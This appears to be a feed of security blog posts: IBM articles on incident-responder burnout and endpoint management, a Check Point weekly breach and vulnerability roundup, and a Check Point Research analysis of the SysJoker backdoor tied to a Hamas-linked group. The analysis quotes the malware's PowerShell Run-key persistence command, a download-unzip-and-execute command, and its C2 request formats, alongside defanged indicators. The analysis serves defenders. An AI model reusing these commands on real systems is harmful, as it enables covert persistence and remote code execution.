One of the more tangible challenges for incident response (IR) is an overall commitment to cyber readiness. Unlike first responders, who have developed a high level of preparedness in their protocols, cyber still lags behind.

“There is still quite a ways to go,” said Bettencourt.

He acknowledged that while much of X-Force’s work skews toward large, more mature enterprise clients, some in certain sectors are still less mature. Small to medium-sized businesses and even larger enterprise organizations that don’t have the resources to invest in cybersecurity often lack the readiness for IR processes.

“Hopefully, it’s not viewed as an obstruction. The business has to adopt cybersecurity as part of the business and not as just a regulatory component that has to be complied with. Because the barrier to entry for cyber criminals has greatly diminished. It’s so easy to jump on the Dark Web and start getting tools and buying malicious Software-as-a-Service kits. It doesn’t take much to be a cyber criminal.”

But lurking in the shadows of the tangible challenges lies an intangible obstacle: responder burnout and stress. According to Bettencourt, studies have shown that, whether it’s cybersecurity, law enforcement, military or high-risk jobs, people often go over and above and beyond because of their team.

“They don’t want to let the team and their team members down,” he said.

With that responsibility, many IR professionals are often self-sacrificing and don’t look out for their own well-being. This can lead to significant burnout and stress.

“Now you have diminishing returns. You have talent retention issues, not just for the company, but for the field in general.”

Adopting the right mindset for IR success

To address the readiness challenges and keep pace with first responders, Bettencourt suggests the enterprise focus on three key areas.

Adaptability

While heavy standardization has its advantages, Bettencourt advises that organizations remain flexible. Especially in a field where technology and threat approaches are constantly changing and there is a constant desire to learn.

“Getting set in your ways in this field is a death knell from a career perspective because it’ll rapidly move past you,” he said. “I left the field for about three years, and it was like drinking from a fire hose when I got back — and I had been doing it for about six years before that.”

Encourage smaller teams

Building a small team culture has produced favorable results for the X-Force team.

“It’s an approach that benefits both the individual and the organization,” he said. “I think leaders really need to try to foster that structure, that culture of small teams where you can rely on each other, and by extension, people will go above and beyond because of their teammates. They don’t want to let their team down, which means they don’t want to let the business or clients down.”

Prioritize mental health

While mental health assistance is readily available in the cyber industry, it’s not discussed enough compared to first responders, where accessing such resources has become more normalized over time.

When it comes to trauma in first response jobs compared to IR and cybersecurity, Bettencourt noted that while there may not be as much physical trauma for cyber, the constant stress of working can build up over time and cause strain.

“Being an individual contributor burned me out,” he admitted. “At one point it was four months straight of 60 and 70-hour weeks. All I worked was ransomware and nation-state engagements, and it became too much for me and my family.”

Preventing burnout improves IR

Long hours are, unfortunately, very common in the field. So how can leadership develop the right mindset to reduce burnout?

“If you’re a business that just cares about the bottom line [and not your personnel], keeping responders happy is going to result in better performance and less attrition, which means less talent acquisition costs. In cyber, it still takes time to bring them up to speed. For IR, generally, if you lose somebody, it’s about six months before you get a replacement that can really contribute, which then means you’re burning your other folks out,” Bettencourt said.

“So from a purely business, mercenary perspective, even if your organization is not employee-focused, it makes sense from the standpoint of performance, client satisfaction, delivering quality outcomes — from the standpoint of nurturing talent, maintaining talent, reducing talent acquisition and retention costs. To me, it’s a no-brainer. You have happier people, and when people are happy, they will typically work harder for you.”

By learning some lessons from first responders, organizations can be ready to face whatever the next cyber crisis brings.

To learn how IBM X-Force can help you with anything regarding cybersecurity including incident response, threat intelligence or offensive security services schedule a meeting here.

If you are experiencing cybersecurity issues or an incident, contact X-Force to help: US hotline 1-888-241-9812 | Global hotline (+001) 312-212-8034.

The post What cybersecurity pros can learn from first responders appeared first on Security Intelligence.

Security Intelligence – ​Read More

Unified endpoint management for purpose-based devices

As purpose-built devices become increasingly common, the challenges associated with their unique management and security needs are becoming clear.

What are purpose-built devices? Most fall under the category of rugged IoT devices typically used outside of an office environment and which often run on a different operating system than typical office devices. Examples include ruggedized tablets and smartphones, handheld scanners and kiosks.

Many different industries are utilizing purpose-built devices, including travel and transportation, retail, warehouse and distribution, manufacturing (including automotive) and healthcare. These devices, often running on Android Open Source Project (AOSP) and non-GMS (non-Google Mobile Services) platforms, are tailored to specific tasks and environments and can enhance productivity and streamline operations. However, managing and supporting these devices can pose a unique set of difficulties.

For the enterprise, investing in applications to manage these devices may seem like the only viable option. However, with the rapid advancements in Unified Endpoint Management (UEM) solutions, organizations can effectively manage and protect purpose-built devices without purchasing a separate, specialized app.

How can a modern UEM app seamlessly integrate and support purpose-built devices across various industries?

The power of a modern UEM app: Key benefits

A UEM solution is a comprehensive platform designed to manage and secure all types of devices. This includes smartphones, tablets, laptops and IoT devices, regardless of their operating system. UEM apps have evolved to support purpose-built devices and can be managed and protected just as efficiently as traditional devices.

Leveraging a wide range of powerful features and capabilities, organizations can address the unique challenges that purpose-built devices pose while streamlining their management processes.

Reduced costs are the most obvious benefit of a UEM app. However, businesses can also take advantage of these ten key benefits and functionalities.

Comprehensive device support: UEM apps support a wide variety of devices and operating systems, including Android Open Source Project (AOSP) and non-GMS platforms. This helps eliminate the need for additional specialized apps.

Customizable profiles and policies: A UEM app allows IT administrators to create custom profiles and policies tailored to specific device types and use cases, enabling them to fine-tune device configurations, security settings and access controls.

Enhanced security: Purpose-built devices often hold sensitive data and are used in critical operations. A UEM app enables IT administrators to implement robust security measures, such as encryption, secure data storage and advanced authentication, to protect from potential threats.

Device compliance: A modern UEM app can help ensure purpose-built devices adhere to industry-specific regulations. By automating device configuration and policy enforcement, a UEM app minimizes the risk of non-compliance and associated penalties.

Simplified updates and maintenance: A UEM app can automate software updates, patches and maintenance tasks for purpose-built devices. This ensures they remain up-to-date and secure — reducing downtime and maximizing device efficiency.

Reduced costs: By consolidating device management into a single UEM app, organizations can eliminate the need for multiple specialized apps, resulting in a lower total cost of ownership (TCO).

Remote monitoring and troubleshooting: Modern UEM apps provide IT administrators with real-time visibility into the status and performance of purpose-built devices, including monitoring device health, network connectivity and battery life. UEM apps can also enable remote troubleshooting and diagnostics.

App management and distribution: A UEM app simplifies the process of deploying, updating and managing apps on purpose-built devices. IT administrators can centrally manage app catalogs, so devices have access to the latest versions of critical apps. IT teams can remotely install, update or remove apps on devices to streamline app management across the organization.

Context-aware management: By incorporating context-aware capabilities, UEM apps allow IT administrators to apply policies and configurations based on factors such as device location, network connectivity or user roles.

Scalability and future-proofing: A UEM app can scale and adapt to the evolving needs of an organization. As businesses grow and adopt new purpose-built devices, a UEM app can easily expand its support to accommodate these devices.

Integration with other IT systems: Current UEM apps seamlessly integrate with other IT systems and platforms, such as enterprise mobility management (EMM) solutions, identity and access management (IAM) systems and IT service management (ITSM) tools.

What is UEM?

Which industries can benefit from UEM apps?

A modern UEM app can support purpose-built devices across a diverse set of industries. Here are the most common:

Travel and transportation: Purpose-built devices here often include ticketing machines, fleet management devices and navigation systems. A UEM app manages these devices efficiently, keeping them updated and protected from security threats.

Retail: Retailers rely on devices such as point-of-sale (POS) systems, inventory scanners and digital signage. A UEM app can manage these devices, secure payment transactions and streamline device deployment and updates.

Warehouse and distribution: Purpose-built devices such as barcode scanners, inventory management systems and forklift-mounted tablets are essential in a warehouse environment.

Manufacturing (including automotive): Manufacturers use purpose-built devices for quality control, production line automation and inventory management. Like in warehouse and distribution, a UEM app can help manage these devices, ensure they comply with industry standards and protect sensitive data.

Healthcare: Healthcare providers use purpose-built devices such as patient monitoring systems, medical imaging equipment and electronic health record (EHR) systems. A UEM app can help secure patient data, keep devices compliant with HIPAA and other regulations and simplify device management across the healthcare ecosystem.

How the enterprise can best leverage UEM

The increasing use of purpose-built devices across various industries requires a robust and flexible management solution. UEM apps have evolved to meet this challenge, providing a comprehensive platform that can effectively manage and protect purpose-built devices alongside traditional devices.

IBM commissioned Forrester Consulting to conduct a Total Economic Impact™ study to help IT and security leaders realize, demonstrate and justify the tangible value of their investment in unified endpoint management.

This study applied Forrester’s TEI methodology to examine the potential return on investment enterprises may capture by deploying IBM MaaS360 with Watson UEM.

Forrester interviewed and surveyed several customers with years of experience using MaaS360 to help key decision-makers identify the cost, benefit, flexibility and risk factors that affect their UEM investment decision.

Conclusion

By adopting a UEM app, organizations can centralize device management, enhance security, ensure compliance, streamline updates and maintenance and reduce costs. This allows businesses to fully leverage the benefits of purpose-built devices without the need for additional specialized applications.

Ultimately, that increased operational efficiency can give your organization the competitive advantage it needs.

The post Unified endpoint management for purpose-based devices appeared first on Security Intelligence.

Security Intelligence – ​Read More

27th November – Threat Intelligence Report

For the latest discoveries in cyber research for the week of 27th November, please download our Threat_Intelligence Bulletin.

TOP ATTACKS AND BREACHES

Nevada-based medical transcription company, Perry Johnson & Associates (PJ&A), has disclosed a data breach that affected more than 9M patients at multiple healthcare providers in the US. The exposed data includes patients’ names, addresses, dates of birth, Social Security Numbers, and medical records. The attack is considered as one of the most severe medical data breaches in recent years.
The British Library, one of the largest libraries in the world, suffered a ransomware attack that resulted in the exposure of internal human resources data. Rhysida ransomware gang has claimed responsibility, setting a starting price of 20 bitcoins (approximately $750K) as a ransom with seven days deadline.

Check Point Threat Emulation and Harmony Endpoint provide protection against this threat (Ransomware.Win.Rhysida; Ransomware.Wins.Rhysida)

A cyberattack on Vanderbilt University Medical Center (VUMC), which operates seven hospitals and numerous healthcare facilities across Nashville, Tennessee, has resulted in a data breach. Meow ransomware gang has claimed responsibility for the attack.
A sophisticated cyberattack on CTS, a UK-based managed service provider (MSP), has disrupted services for hundreds of law firms. The attack blocked access of hundreds of British law firms from their case management systems, causing delays in legal proceedings and disrupting communication between clients and lawyers. CTS is working to restore services, but no timeline has been given.
Ransomware group AlphV/BlackCat has assumed responsibility for the cyber-attack on the American real estate insurance giant Fidelity National Financial (FNF), a Fortune 500 company, resulting in the shutdown of its network.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.BlackCat, Ransomware_Linux_BlackCat, Ransomware_Linux_BlackCat)

The Idaho National Laboratory (INL), a US-based nuclear research center, has confirmed a data breach that resulted in the exposure of internal human resources data. Hacktivists group SiegedSec took responsibility for the attack, claiming to have stolen the personal information of hundreds of thousands of employees, users, and citizens. The allegedly leaked data includes full names, dates of birth, email addresses, phone numbers, Social Security Numbers, addresses and employment info.

VULNERABILITIES AND PATCHES

Sucuri has released its WordPress Vulnerability & Patch Roundup November 2023. Among the vulnerabilities is the high-severity Elementor Website Builder Stored Cross-Site Scripting flaw (CVE-2023-47505), nine additional medium-severity flaws including WooCommerce Checkout Manager Missing Authorization flaw (CVE-2023-47681), and other low-severity flaws.
The open-source file-sharing software ownCloud has warned of three critical security vulnerabilities, including a flaw in containerized deployments for certain graphapi versions, a WebDAV Api Authentication Bypass using Pre-Signed URLs affecting core versions, and a Subdomain Validation Bypass in oauth2. These flaws could be exploited to expose confidential data and manipulate files.
Mozilla has released security patches for Firefox and Thunderbird, which address multiple high severity vulnerabilities. Some of the vulnerabilities potentially allowed remote code execution if exploited.

THREAT INTELLIGENCE REPORTS

Check Point Research provides a case study of some of the most recent ransomware attacks targeting Linux systems and ESXi systems, which have been increasing over the last few years. The study, encompassing 12 prominent ransomware families, investigates the motivations behind developing ransomware for Linux and reveals that many Linux-targeting families heavily utilize the OpenSSL library along with ChaCha20/RSA and AES/RSA algorithms.
Check Point Research shares insights from their active tracking of the evolution of SysJoker, a previously publicly unattributed multi-platform backdoor, which we asses was utilized by a Hamas-affiliated APT to target Israel. Notably, the tool went through prominent changes including the shift to Rust language and a move to using OneDrive instead of Google Drive to store dynamic C2 URLs.

Check Point Harmony Endpoint, Threat Emulation and Anti-Bot provide protection against this threat (Backdoor.Wins.Sysjoker.ta, Backdoor_Linux_SysJoker, Backdoor.Win.SysJoker, Backdoor.WIN32.SysJoker)

Check Point Research, using Threat Intel Blockchain system, uncovered an ongoing sophisticated Rug Pull scheme that managed to pilfer nearly $1M. The actor behind this scheme was traced, unveiling the perpetrator lured unsuspecting victims into investing using the crowd’s hype around ill-gotten gains.

CISA has published a #StopRansomware report on LockBit 3.0 ransomware operation. The report is based, among others, on information shared by Boeing, which had been affected by the group recently.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.Lockbit; Gen.Win.Crypter.Lockbit; Ransomware.Wins.LockBit.ta; Ransomware_Linux_Lockbit)

The post 27th November – Threat Intelligence Report appeared first on Check Point Research.

Check Point Research – ​Read More

Israel-Hamas War Spotlight: Shaking the Rust Off SysJoker

Key Findings

Check Point Research is actively tracking the evolution of SysJoker, a previously publicly unattributed multi-platform backdoor, which we asses was utilized by a Hamas-affiliated APT to target Israel.

Among the most prominent changes is the shift to Rust language, which indicates the malware code was entirely rewritten, while still maintaining similar functionalities. In addition, the threat actor moved to using OneDrive instead of Google Drive to store dynamic C2 (command and control server) URLs.

Analysis of newly discovered variants of SysJoker revealed ties to previously undisclosed samples of Operation Electric Powder, a set of targeted attacks against Israeli organizations between 2016-2017 that were loosely linked to the threat actor known as Gaza Cybergang.

Introduction

Amid tensions in the ongoing Israel-Hamas war, Check Point Research has been conducting active threat hunting in an effort to discover, attribute, and mitigate relevant regional threats. Among those, some new variants of the SysJoker malware, including one coded in Rust, recently caught our attention. Our assessment is that these were used in targeted attacks by a Hamas-related threat actor.

SysJoker, initially discovered by Intezer in 2021, is a multi-platform backdoor with multiple variants for Windows, Linux and Mac. The same malware was also analyzed in another report a few months after the original publication. Since then, SysJoker Windows variants have evolved enough to stay under the radar.

As we investigated the newer variants of SysJoker that were utilized in targeted attacks in 2023, we also discovered a variant written in Rust, which suggests the malware code was completely rewritten. In addition, we also uncovered behavioral similarities with another campaign named Operation Electric Powder which targeted Israel in 2016-2017. This campaign was previously linked to Gaza Cybergang (aka Molerats), a threat actor operating in conjunction with Palestinian interests.

In this article, we drill down into the Rust version of SysJoker, as well as disclose additional information on other SysJoker Windows variants and their attribution.

Rust SysJoker Variant

The SysJoker variant (9416d7dc2ecdeda92ba35cd5e54eb044), written in Rust, was submitted to VirusTotal with the name php-cgi.exe on October 12, 2023. Compiled a few months earlier on August 7, it contains the following PDB path: C:CodeRustRustDown-BelaltargetreleasedepsRustDown.pdb.

The malware employs random sleep intervals at various stages of its execution, which may serve as possible anti-sandbox or anti-analysis measures.

The sample has two modes of operation which are determined by its presence in a particular path. This is intended to differentiate the first execution from any subsequent ones based on persistence.

First, it checks whether the current running module matches the path C:ProgramDataphp-7.4.19-Win32-vc15-x64php-cgi.exe. Based on the outcome the malware proceeds to one of the two possible stages.

First execution

If the sample runs from a different location, indicating it’s the first time the sample is executed, the malware copies itself to the path C:ProgramDataphp-7.4.19-Win32-vc15-x64php-cgi.exe and then runs itself from the newly created path using PowerShell with the following parameter:

-Command C:ProgramDataphp-7.4.19-Win32-vc15-x64php-cgi.exe

Finally, it creates a persistence mechanism and then exits the program.

Persistence is established in an unusual way, using PowerShell with the following argument:

-Command “$reg=[WMIClass]’ROOTDEFAULT:StdRegProv’;
$results=$reg.SetStringValue(‘&H80000001′,’SoftwareMicrosoftWindowsCurrentVersionRun’, ‘php-cgi’, ‘C:ProgramDataphp-7.4.19-Win32-vc15-x64php-cgi.exe’);”

Eventually, this PowerShell code creates a registry Run key in the HKEY_CURRENT_USER hive, which points to the copy of the executable, using the WMI StdRegPro class instead of directly accessing the registry via the Windows API or reg.exe.

Subsequent executions (from persistence)

SysJoker contacts a URL on OneDrive to retrieve the C2 server address. The URL is hardcoded and encrypted inside the binary:

https://onedrive.live[.]com/download?resid=16E2AEE4B7A8BBB1%21112&authkey=!AED7TeCJaC7JNVQ

The response must should contain also a XOR-encrypted blob of data that is encoded in base64. During our investigation, the following response was received:

KnM5Sjpob2glNTY8AmcaYXt8cAh/fHZ+ZnUNcwdld2Mr

After decryption, the C2 IP address and port are revealed:

{“url”:”http://85.31.231[.]49:443″}

Using OneDrive allows the attackers to easily change the C2 address, which enables them to stay ahead of different reputation-based services. This behavior remains consistent across different versions of SysJoker.

The malware collects information about the infected system, including the Windows version, username, MAC address, and various other data. This information is then sent to the /api/attach API endpoint on the C2 server, and in response it receives a unique token that serves as an identifier when the malware communicates with the C2:

Figure 1 – Bot registration api call.

After registration with the C2 server, the sample runs the main C2 loop. It sends a POST request containing the unique token to the /api/req endpoint, and the C2 responds with JSON data:

Figure 2 – Command request and response.

The expected response from the server is a JSON that contains a field named data that contains an array of actions for the sample to execute. Each array consists of id and request fields. The request field is another JSON with fields called url and name. An example of the response from the server:

{“data”:[{“id”:”1″, “request”:”{“url”: “http://85.31.231[.]49/archive_path”, “name”:”mal_1.exe”}”}, {“id”:”2″, “request”:”{“url”: “http://85.31.231[.]49/archive_path”, “name”:”mal_2.exe”}”}]}

The malware downloads a zip archive from the URL specified in the url field. The archive contains an executable that after unzipping is saved as the name field into C:ProgramDataphp-Win32-libs folder. The archive is unzipped using the following PowerShell command:

powershell -Command Expand-Archive -Path C:ProgramDataphp-Win32-libsXMfmF.zip -DestinationPath C:ProgramDataphp-Win32-libs ; start C:ProgramDataphp-Win32-libsexe_name.exe

It is important to mention that in previous SysJoker operations, the malware also had the ability not only to download and execute remote files from an archive but also to execute commands dictated by the operators. This functionality is missing in the Rust version. After receiving and executing the file download command, depending on whether the operation was successful or not, the malware contacts the C2 server again and send a success or exception message to the path /api/req/res. The server sends back a JSON confirmation indicating that it has received the information: {“status”:”success”}.

Encryption

The malware has two methods for string decryption. The first method is simple and appears across multiple SysJoker variants. The sample contains several base64-encoded encrypted data blobs and a base64-encoded key. Upon decryption, both blobs are base64-decoded and then XORed to produce the plain text strings.

The second encryption method is tedious and is spliced in-line throughout the program repeatedly at compile time. This generates a complex string decryption algorithm throughout the sample.

Figure 3 – Example of the decryption of the string “php-”.

Windows SysJoker Variants

In addition to the newly found Rust variant, we uncovered two more SysJoker samples that were not publicly exposed in the past. Both of these samples are slightly more complex than the Rust version or any of the previously analyzed samples, possibly due to the public discovery and analysis of the malware. One of these samples, in contrast to other versions, has a multi-stage execution flow, consisting of a downloader, an installer, and a separate payload DLL.

DMADevice variant

The DMADevice sample (d51e617fe1c1962801ad5332163717bb) was compiled in May 2022, a few months after SysJoker was first uncovered.

Like other versions, the malware starts by retrieving the C2 server address by contacting the URL: 

https://onedrive.live[.]com/download?cid=F6A7DCE38A4B8570&resid=F6A7DCE38A4B8570!115&authkey=AKcf8zLcDneJZHw

The OneDrive link responds with an encrypted base64-encoded string, which is decrypted with the XOR key QQL8VJUJMABL8H5YNRC9QNEOHA4I3QDAVWP5RY9L0HCGWZ4T7GTYQTCQTHTTN8RV6BMKT3AICZHOFQS8MTT. This is the same key that is used in the Rust version.

The decrypted blob contains a JSON with the C2 domain in the following format:

{“url”:”http://sharing-u-file[.]com”}

Next, the malware proceeds to the three-stage execution process.

1. Setup files and persistence

The sample generates a unique bot ID, sends it in a POST request to the /api/cc API endpoint, and receives back the JSON describing the desired malware setup on the infected machine.

The JSON has the following structure:

{“key”:”f57d611b-0779-4125-a3e8-4f8ca3116509″,”pi”:”VwUD[REDACTED]”,”data”:”PRdkHUVFVA9pQl5BXA8YE2JHQgZBBFVpVRJZQU0RdXx3cVVPD1ZSRhoTdS9sY1hbTFldXlx8QwIRSRppeSdrDA1GRVhZW3lXBRtSHFMTHUBpfXZkVkFBRVtaQyhdBhZJWAoaT0NDXkZTR0NRA1lbSlNJVEABElRaXQ8YE11FSA8RSRpeQAdKF0MfE20ZVhBrI3IXJXJ1ESpmc2JrZX57d2ZibDN2OWRgXQVKDBJcV0VqaWdQCFFYE0VtbSFYQkVSV1liVEBGRA5dOWR/QQgYP05lEx0UaR9NRmdyI2lia0JxH3MVFQ8aVEpQD00RQV1DQlxNEARBX1BbUBBFRnpCEBt3WA5IEBpyV05bVVtbSkEUEExLDEEYREMfE2J5c2RuJ2dyOGp8WAFfX0RYX1lobWVcQwVcEktxaCVNERNWX0VgUEJKD1pZOGpjRAwPbQ==”}

The field key in the JSON is used to XOR-decrypt the other fields after they are base64-decoded: the pi field contains the victim’s IP address and the data field contains the array with multiple values:

[“SystemDrive”,”ProgramData”,”DMADevice”,”DMASolutionInc”,”DMASolutionInc.exe”,”DMASolutionInc.dll”,”powershell.exe”,”cmd”,”open”,”start”,”/c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V”,”/t REG_SZ /D”,”.exe”,”$env:username | Out-File -Encoding ‘utf8’ ‘”,”SOFTWARE\Microsoft\Windows\CurrentVersion\Run”]

Those values are utilized in the following order:

SystemDrive – Get the system hard drive letter.

ProgramData – Create these two folders under the specified (in this case, ProgramData) folder:
– DMADevice – The first folder name created.
– DMASolutionInc.exe – The file name used by the currently running executable to self-replicate into the DMADevice folder.

DMASolutionInc.dll – The name of the config file.

DMASolutionInc – The second folder name created.

The rest of the values are used in a few commands that establish persistence via the registry Run key and retrieve the current user name from $env into the temporary txt file.

The config file, in our case DMASolutionInc.dll, is stored on a disk encrypted (using the same key used to decrypt the domain) and base64-encoded. It contains encrypted JSON with the following fields:

{“id”:”[BOT-ID]”,”us”:”[USERNAME]”,”ip”:”[IP]”}

After performing all these operations, the sample executes its copy from DMASolutionInc.exe and exits.

2. Register with the C2 server

When the sample is executed again (via persistence from the previous stage), it checks the location it is running from. It then continues the execution by making a POST request to /api/add containing the uuid, user name, and user token, which is also generated by the malware:

uuid=bot-id&nu=username&user_token=token

The server responds with a token generated on its side which is then used for all the subsequent C2 requests.

3. C2 main loop

The token received during the previous stage is used for making POST requests to /api/cr on the C2 server to retrieve the commands to execute.

Similar to other SysJoker variants, the server responds with a JSON that contains field data which is an array of actions to take. This version can download and execute files or run commands and upload the results to the C2 server. For each command in the array, the sample sends a response reporting if it was successful or not.

AppMessagingRegistrar variant

This variant has a compilation timestamp of June 2022 and has a quite different execution flow. The functionality of the malware is divided into two separate components: a downloader (DDN, c2848b4e34b45e095bd8e764ca1a4fdd) and a backdoor (AppMessagingRegistrar, 31c2813c1fb1e42b85014b2fc3fe0666).

DDN Downloader

The threat actors first deliver a lightweight downloader. It creates the folder C:ProgramDataNuGet Library, then downloads a zip file from https://filestorage-short[.]org/drive/AppMessagingRegistrar.zip . It unzips the file, copies it into the AppMessagingRegistrar.exe file and then executes it.

Splitting the functionality into separate components has proved effective: at the time of the first submission to VirusTotal (VT), the malware was not detected by any of the platform’s engines:

Figure 4 – DNN downloader with 0 detections on its first submission to VT (2023-04-09).

AppMessagingRegistratar

Upon execution, this payload first checks the registry key SOFTWAREIntelUNPProgramUpdatesUUID for the UUID of the PC. If the registry key is not available, a UUID is generated using the UuidCreate function and is then saved to the previously mentioned key.

Figure 5 – Uuid Generation.

The variant then proceeds to decrypt a hardcoded OneDrive URL to retrieve a C2 address. The XOR key in this sample is 22GC18YH0N4RUE0BSJOAVW24624ULHIQGS4Y1BQQUZYTENJN2GBERQBFKF2W78H7.

After the C2 address is decrypted, a POST request is made to the C2 server API endpoint /api/register which contains the previously generated UUID.

The server responds with a JSON containing a token and a status message: 

{“status”: “success”, “token”:”[TOKEN]”, “status_num”:1}

The status indicates if the request was valid or not, and the samples check specifically for the string “success”. The token is used for all the following C2 requests but unlike all the other samples, instead of using the body of requests, it is sent in the Authorization header: Authorization: Bearer [TOKEN]. This change could be to accommodate additional flows in the malware execution (discussed below) in which the malware sends a GET request instead of a POST and requires a mechanism for the server to identify the sender.

The status_num field is used as a global flag to indicate what actions the bot should take. There are four statuses available:

Status NumberActionDescription0SetupDownload MsoftInit.dll and execute the init and step exports.1Idle loopWait for status_num to change.3Payload retrievalDownload and save MsoftNotify.dll DLL.4Payload executionExecute MsoftNotify.dll DLL.

Setup phase
If the received status_num is 0, the malware creates the C:ProgramDataIntelUNPProgramUpdates and C:ProgramDataIntelDriversMsoftUpdates folders. It then proceeds to:

Download a DLL file using the function UrlDownloadToFileW from the path /api/library/[TOKEN] and save it to C:ProgramDataIntelDriversMsoftUpdatesMsoftInit.dll.

Load the MsoftInit.dll and call the init exported function.

Load the same DLL again and call the step exported function.

The exact purpose of those functions is unknown as we were not able to retrieve the DLL. However, due to the names and our analysis of previous versions of the malware, we believe they were part of the persistence and setup process. Finally, the malware sends an empty POST request to the API endpoint /api/update. The expected response from the server is an empty JSON.

Idle loop
If the status_num is 1, the malware continues to make requests to the C2 API endpoint /api/status in an infinite loop. To break the loop, the status_num must change.

Main payload download
If the status_num is 3, the malware proceeds to download a DLL file from URL /api/library/[TOKEN] and saves it to the path C:ProgramDataIntelDriversMsoftUpdatesMsoftNotify.dll. It then sends a request to the C2 API endpoint /api/ready: if the server responds with a status success, the status flag is then set to 4.

Payload execution
If the status is 4, the malware proceeds to make a GET request to the C2 API endpoint /api/requests. The C2 server responds with a JSON with 3 parameters, id, r, and k.

The malware then loads the MsoftNotify.dll DLL and resolves the function st. The r and k values sent from the server are used by st as parameters. We were not able to retrieve the DLL, but based on the previous versions, this is likely a version of the main command running functionality for the backdoor, and its return value should be a string. After the function runs and returns a result, the id received in the token is used in the POST request to the C2 which contains the output:

POST /api/requests/[ID] HTTP/1.1
Host: [62.108.40.129](https://www.virustotal.com/gui/url/79fde5d4b19cbd1f920535215c558b6ff63973b7af7d6bd488e256821711e0b1)
Accept: application/json
Authorization: Bearer [TOKEN]
Content-Length: 15
Content-Type: application/x-www-form-urlencoded

response=[EXECUTION OUTPUT]

Infrastructure

The infrastructure used in this campaign is configured dynamically. First, the malware contacts a OneDrive address, and from there, it decrypts the JSON containing the C2 address with which to communicate. The C2 address is encrypted with a hardcoded XOR key and base64-encoded.

This threat actor commonly uses cloud storage services. Previous reports show Google Drive was used for the same purpose.

Figure 6 – Metadata of OneDrive file containing the encrypted C2 server.

Ties to Operation Electric Powder

The SysJoker backdoor uses its own custom encryption for three main strings: the OneDrive URL containing the final C2 address, the C2 address received from the request to OneDrive, and a PowerShell command used for persistence:

$reg=[WMIClass]’ROOTDEFAULT:StdRegProv’;
$results=$reg.SetStringValue(‘&H80000001’,’SoftwareMicrosoftWindowsCurrentVersionRun'[TRUNCATED]

This PowerShell command based on the StdRegProv WMI class is quite unique. It is shared between multiple variants of SysJoker and only appears to be shared with one other campaign, associated with Operation Electric Powder previously reported by ClearSky.

The 2017 report describes the persistent activity carried out in 2016-2017 against the Israel Electric Company (IEC). This operation used phishing and fake Facebook pages to deliver both Windows and Android malware. Windows malware used in this campaign consisted of a dropper, a main backdoor, and a Python-based keylogging and screen-grabbing module.

Throughout our analysis of the SysJoker operation, we saw indications suggesting that the same actor is responsible for both attacks, despite the large time gap between the operations. Both campaigns used API-themed URLs and implemented script commands in a similar fashion. This includes the Run registry value but is not the only common factor. For example, the following image shows the similarities between the commands used by different malware when gathering recon data from the infected device to temporary text files:

Figure 7 – Use of the type command in Electric Powder → the original SysJoker → DMADevice SysJoker variant.

Conclusion

Although the SysJoker malware, which was first seen in 2021 and publicly described in 2022, wasn’t attributed to any known actor, we found evidence that this tool and its newer variants have been used as part of the Israeli-Hamas conflict. We were also able to make a connection between SysJoker and the 2016-2017 Electric Powder Operation against Israel Electric Company.

In our report, we described the evolution of the malware and the changes in the complexity of its execution flow, as well as its latest shift to the Rust language and the latest infrastructure it uses.

The earlier versions of the malware were coded in C++. Since there is no straightforward method to port that code to Rust, it suggests that the malware underwent a complete rewrite and may potentially serve as a foundation for future changes and improvements.

Check Point Customers Remain Protected

Check Point Customers remain protected against attacks detailed in this report, while using Check Point Anti-Bot, Harmony Endpoint and Threat Emulation.

Threat Emulation
Backdoor.Wins.Sysjoker.ta.R
Backdoor.Wins.Sysjoker.ta.Q
Backdoor.Wins.Sysjoker.ta.P
Backdoor.Wins.Sysjoker.ta.O
Backdoor.Wins.Sysjoker.ta.N
Backdoor.Wins.Sysjoker.ta.M
Backdoor.Wins.Sysjoker.ta.L

Harmony Endpoint
Backdoor.Win.SysJoker.H

Check Point Anti-Bot
Backdoor.WIN32.SysJoker.A
Backdoor.WIN32.SysJoker.B
Backdoor.WIN32.SysJoker.C

IOCs

Infrastructure

85.31.231[.]49sharing-u-file[.]comfilestorage-short[.]orgaudiosound-visual[.]com62.108.40[.]129

Hashes

d4095f8b2fd0e6deb605baa1530c32336298afd026afc0f41030fa43371e3e726c8471e8c37e0a3d608184147f89d81d62f9442541a04d15d9ead0b3e0862d95e076e9893adb0c6d0c70cd7019a266d5fd02b429c01cfe51329b2318e923983696dc31cf0f9e7e59b4e00627f9c7f7a8cac3b8f4338b27d713b0aaf6abacfe6f67ddd2af9a8ca3f92bda17bd990e0f3c4ab1d9bea47333fe31205eede8ecc7060ff6ff167c71b86c511c36cba8f75d1d5209710907a807667f97ce323df9c4ba

The post Israel-Hamas War Spotlight: Shaking the Rust Off SysJoker appeared first on Check Point Research.

Check Point Research – ​Read More